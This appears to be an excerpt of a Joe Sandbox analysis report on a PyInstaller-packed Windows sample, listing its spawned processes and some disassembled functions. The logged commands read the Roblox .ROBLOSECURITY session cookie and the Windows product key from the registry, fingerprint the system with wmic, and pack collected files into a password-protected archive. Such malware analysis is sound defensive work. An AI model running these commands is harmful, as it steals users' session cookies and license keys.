Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	100
Start time:	02:38:19
Start date:	13/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Imagebase:	0x7ff6eb350000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	101
Start time:	02:38:27
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\7VKXZ.zip" *"
Imagebase:	0x7ff772ad0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	102
Start time:	02:38:27
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff68cce0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	103
Start time:	02:38:27
Start date:	13/12/2024
Path:	C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\7VKXZ.zip" *
Imagebase:	0x7ff6256b0000
File size:	630'736 bytes
MD5 hash:	9C223575AE5B9544BC3D69AC6364F75E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	104
Start time:	02:38:28
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic os get Caption"
Imagebase:	0x7ff772ad0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	105
Start time:	02:38:28
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff68cce0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	106
Start time:	02:38:28
Start date:	13/12/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic os get Caption
Imagebase:	0x7ff7a81b0000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	107
Start time:	02:38:29
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
Imagebase:	0x7ff772ad0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	108
Start time:	02:38:29
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff68cce0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	109
Start time:	02:38:29
Start date:	13/12/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic computersystem get totalphysicalmemory
Imagebase:	0x7ff7a81b0000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	110
Start time:	02:38:30
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
Imagebase:	0x7ff772ad0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 6172, Parent PID: 8132

General

Target ID:	111
Start time:	02:38:30
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff68cce0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	112
Start time:	02:38:30
Start date:	13/12/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic csproduct get uuid
Imagebase:	0x7ff7a81b0000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	113
Start time:	02:38:31
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
Imagebase:	0x7ff772ad0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	114
Start time:	02:38:31
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff68cce0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	115
Start time:	02:38:31
Start date:	13/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Imagebase:	0x7ff6eb350000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	116
Start time:	02:38:32
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Imagebase:	0x7ff772ad0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 2856, Parent PID: 3408

General

Target ID:	117
Start time:	02:38:32
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff68cce0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	118
Start time:	02:38:32
Start date:	13/12/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic path win32_VideoController get name
Imagebase:	0x7ff7a81b0000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	119
Start time:	02:38:33
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
Imagebase:	0x7ff772ad0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	120
Start time:	02:38:33
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff68cce0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	121
Start time:	02:38:33
Start date:	13/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
Imagebase:	0x7ff6eb350000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	122
Start time:	02:38:53
Start date:	13/12/2024
Path:	C:\Program Files\Windows Defender\MpCmdRun.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Imagebase:	0x7ff750e60000
File size:	468'120 bytes
MD5 hash:	B3676839B2EE96983F9ED735CD044159
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	123
Start time:	02:38:53
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff68cce0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	8.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	19.9%
Total number of Nodes:	2000
Total number of Limit Nodes:	31

Executed Functions

Function 00007FF79A318BD0 Relevance: 70.3, APIs: 36, Strings: 4, Instructions: 257
synchronizationwindowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF79A319400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF79A3145E4,00000000,00007FF79A311985), ref: 00007FF79A319439

SetConsoleCtrlHandler.KERNEL32(?,?,FFFFFFFF,00007FF79A313F7F), ref: 00007FF79A318C2B
GetStartupInfoW.KERNEL32(?,FFFFFFFF,00007FF79A313F7F), ref: 00007FF79A318C46

Part of subcall function 00007FF79A32A4EC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF79A32A500

Part of subcall function 00007FF79A32878C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF79A3287F3

GetCommandLineW.KERNEL32(?,FFFFFFFF,00007FF79A313F7F), ref: 00007FF79A318CD6
CreateProcessW.KERNELBASE ref: 00007FF79A318D0E
GetLastError.KERNEL32(?,FFFFFFFF,00007FF79A313F7F), ref: 00007FF79A318D18

Part of subcall function 00007FF79A312C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF79A313706,?,00007FF79A313804), ref: 00007FF79A312C9E
Part of subcall function 00007FF79A312C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF79A313706,?,00007FF79A313804), ref: 00007FF79A312D63
Part of subcall function 00007FF79A312C50: MessageBoxW.USER32 ref: 00007FF79A312D99

RegisterClassW.USER32 ref: 00007FF79A318D70
GetLastError.KERNEL32(?,FFFFFFFF,00007FF79A313F7F), ref: 00007FF79A318D7B
CreateWindowExW.USER32 ref: 00007FF79A318DC5
GetLastError.KERNEL32(?,FFFFFFFF,00007FF79A313F7F), ref: 00007FF79A318DD7
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF79A313F7F), ref: 00007FF79A318DF2
GetLastError.KERNEL32(?,FFFFFFFF,00007FF79A313F7F), ref: 00007FF79A318E05
PeekMessageW.USER32 ref: 00007FF79A318E29
TranslateMessage.USER32 ref: 00007FF79A318E37
DispatchMessageW.USER32(?,FFFFFFFF,00007FF79A313F7F), ref: 00007FF79A318E41
PeekMessageW.USER32 ref: 00007FF79A318E5C
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF79A313F7F), ref: 00007FF79A318E6E
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF79A313F7F), ref: 00007FF79A318E89
TerminateProcess.KERNEL32(?,FFFFFFFF,00007FF79A313F7F), ref: 00007FF79A318E9F
GetLastError.KERNEL32(?,FFFFFFFF,00007FF79A313F7F), ref: 00007FF79A318EA9
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF79A313F7F), ref: 00007FF79A318EB7
DestroyWindow.USER32(?,FFFFFFFF,00007FF79A313F7F), ref: 00007FF79A318FF4
GetExitCodeProcess.KERNELBASE ref: 00007FF79A319009
CloseHandle.KERNEL32(?,FFFFFFFF,00007FF79A313F7F), ref: 00007FF79A319012
CloseHandle.KERNEL32(?,FFFFFFFF,00007FF79A313F7F), ref: 00007FF79A31901F

Strings

Failed to create child process!, xrefs: 00007FF79A318D20
PyInstallerOnefileHiddenWindow, xrefs: 00007FF79A318D44
CreateProcessW, xrefs: 00007FF79A318D27
PyInstaller Onefile Hidden Window, xrefs: 00007FF79A318D85

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
API String ID: 3832162212-3165540532
Opcode ID: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
Instruction ID: 05c46e7c3f19d902a82c6ca35d0ffc88125f0170587f6fbf4177c0ea1be8c11b
Opcode Fuzzy Hash: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
Instruction Fuzzy Hash: 11D16032E0AA8286F720EF74E8542A9B760FB84B58FC0427DEA5D42A94DF3CD545C754

Function 00007FF79A311000 Relevance: 61.8, APIs: 7, Strings: 28, Instructions: 509
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to load splash screen resources!, xrefs: 00007FF79A313E85
_PYI_ARCHIVE_FILE, xrefs: 00007FF79A3138D2, 00007FF79A3139FF
Could not load PyInstaller's embedded PKG archive from the executable (%s), xrefs: 00007FF79A313971
_PYI_APPLICATION_HOME_DIR not set for onefile child process!, xrefs: 00007FF79A313D35
PYINSTALLER_SUPPRESS_SPLASH_SCREEN, xrefs: 00007FF79A313E0A
Could not side-load PyInstaller's PKG archive from external file (%s), xrefs: 00007FF79A3139DE
Py_GIL_DISABLED, xrefs: 00007FF79A313AF4
pyi-python-flag, xrefs: 00007FF79A313AD6
pkg, xrefs: 00007FF79A3139BE
MEI, xrefs: 00007FF79A313933
pyi-disable-windowed-traceback, xrefs: 00007FF79A313BB2
Failed to convert DLL search path!, xrefs: 00007FF79A313DDC
Could not create temporary directory!, xrefs: 00007FF79A313CBF
Failed to initialize security descriptor for temporary directory!, xrefs: 00007FF79A313C61
Failed to remove temporary directory: %s, xrefs: 00007FF79A313FC3
Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s, xrefs: 00007FF79A313B32
Failed to unpack splash screen dependencies from PKG archive!, xrefs: 00007FF79A313EA6
Path exceeds PYI_PATH_MAX limit., xrefs: 00007FF79A313D12
_PYI_PARENT_PROCESS_LEVEL, xrefs: 00007FF79A313A17, 00007FF79A313A2F, 00007FF79A313A9B
VCRUNTIME140.dll, xrefs: 00007FF79A313DB1
_PYI_APPLICATION_HOME_DIR, xrefs: 00007FF79A313A0B, 00007FF79A313CD4, 00007FF79A313F6B
PYINSTALLER_STRICT_UNPACK_MODE, xrefs: 00007FF79A313BE8
bye-runtime-tmpdir, xrefs: 00007FF79A313B68
_PYI_SPLASH_IPC, xrefs: 00007FF79A313A23, 00007FF79A313EF5
pyi-contents-directory, xrefs: 00007FF79A313B8D
Failed to load Tcl/Tk shared libraries for splash screen!, xrefs: 00007FF79A313EBB
Failed to start splash screen!, xrefs: 00007FF79A313ED4
PYINSTALLER_RESET_ENVIRONMENT, xrefs: 00007FF79A313882, 00007FF79A3138AF

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: ErrorFileLastModuleName
String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag
API String ID: 2776309574-3273434969
Opcode ID: 44b6149e1a44f815cbaf6e2375de99b2dfa5e961a20aa3e5c6a8e77e9d9f5974
Instruction ID: 0cf9c1b22694ffbcbc11b5977d8b8f83a031d1d6c560bfee3f93159889580c1e
Opcode Fuzzy Hash: 44b6149e1a44f815cbaf6e2375de99b2dfa5e961a20aa3e5c6a8e77e9d9f5974
Instruction Fuzzy Hash: 35329A22E0E68291FAB5FB3194543B9F6A1AF44784FC540BEDA4D432D6EF2CE559C320

Function 00007FF79A3369D4 Relevance: 13.8, APIs: 9, Instructions: 276
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF79A336708: _invalid_parameter_noinfo.LIBCMT ref: 00007FF79A336749
Part of subcall function 00007FF79A336708: _invalid_parameter_noinfo.LIBCMT ref: 00007FF79A3367C7
Part of subcall function 00007FF79A336708: _invalid_parameter_noinfo.LIBCMT ref: 00007FF79A336818

CreateFileW.KERNELBASE ref: 00007FF79A336ADA
CreateFileW.KERNEL32 ref: 00007FF79A336B2A
GetLastError.KERNEL32 ref: 00007FF79A336B5A
GetFileType.KERNELBASE ref: 00007FF79A336B6F
GetLastError.KERNEL32 ref: 00007FF79A336B79
CloseHandle.KERNEL32 ref: 00007FF79A336BAC
CloseHandle.KERNEL32 ref: 00007FF79A336D0F
CreateFileW.KERNEL32 ref: 00007FF79A336D44
GetLastError.KERNEL32 ref: 00007FF79A336D53

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
String ID:
API String ID: 1617910340-0
Opcode ID: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
Instruction ID: 5f82996227fa5378870b2b28f75933b8870d17b2b7b8c67f920999bd86a178dd
Opcode Fuzzy Hash: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
Instruction Fuzzy Hash: 81C1CF32F29A418AFB24EF79C4902AD7761EB49B98B81526DDF2E57794CF38D011C310

Function 00007FF79A3183B0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,00007FF79A318B09,00007FF79A313FA5), ref: 00007FF79A31841B
RemoveDirectoryW.KERNEL32(?,00007FF79A318B09,00007FF79A313FA5), ref: 00007FF79A31849E
DeleteFileW.KERNELBASE(?,00007FF79A318B09,00007FF79A313FA5), ref: 00007FF79A3184BD
FindNextFileW.KERNELBASE(?,00007FF79A318B09,00007FF79A313FA5), ref: 00007FF79A3184CB
FindClose.KERNEL32(?,00007FF79A318B09,00007FF79A313FA5), ref: 00007FF79A3184DC
RemoveDirectoryW.KERNELBASE(?,00007FF79A318B09,00007FF79A313FA5), ref: 00007FF79A3184E5

Strings

%s\*, xrefs: 00007FF79A3183E2

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
String ID: %s\*
API String ID: 1057558799-766152087
Opcode ID: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
Instruction ID: b245a6d5e6da75a0f844115528a7a28c14c3ff5ee32dd14997095a75ec9c24f9
Opcode Fuzzy Hash: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
Instruction Fuzzy Hash: 62416221B0E54285FA70FB34E4495B9B360FB94754FC0067EE69D426D4DF3CD5468724

Function 00007FF79A3192F0 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNELBASE ref: 00007FF79A319323
FindClose.KERNELBASE ref: 00007FF79A319332

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
Instruction ID: 34a9221a88493ed2c2ef344eeacc4a411f978b4c18ae2030bd93ff780e9f6f3e
Opcode Fuzzy Hash: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
Instruction Fuzzy Hash: 23F04422A1A64186F7709F70B489766B390BB84768F84067DEAAD026D4DF7CD0498A10

Function 00007FF79A311950 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF79A317F80: _fread_nolock.LIBCMT ref: 00007FF79A31802A

_fread_nolock.LIBCMT ref: 00007FF79A311A1B

Part of subcall function 00007FF79A312910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF79A311B6A), ref: 00007FF79A31295E

Strings

fseek, xrefs: 00007FF79A3119F5
Failed to read cookie!, xrefs: 00007FF79A311A2B
malloc, xrefs: 00007FF79A311B22
Error on file., xrefs: 00007FF79A311B8D
Could not allocate memory for archive structure!, xrefs: 00007FF79A311A61
calloc, xrefs: 00007FF79A311A68
MEI, xrefs: 00007FF79A311991
Could not allocate buffer for TOC!, xrefs: 00007FF79A311B1B
Failed to seek to cookie position!, xrefs: 00007FF79A3119EE
Could not read full TOC!, xrefs: 00007FF79A311B55
fread, xrefs: 00007FF79A311A32, 00007FF79A311B5C

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: _fread_nolock$CurrentProcess
String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
API String ID: 2397952137-3497178890
Opcode ID: 7f967e8bf4bd65ccd330245f6cf3beef5728b9bf280203bc786e936cb306ff0d
Instruction ID: 03c4d08e3115ac42c21fa2e0a380b22c70f6257345d3ce32a4b19bf3b1daf547
Opcode Fuzzy Hash: 7f967e8bf4bd65ccd330245f6cf3beef5728b9bf280203bc786e936cb306ff0d
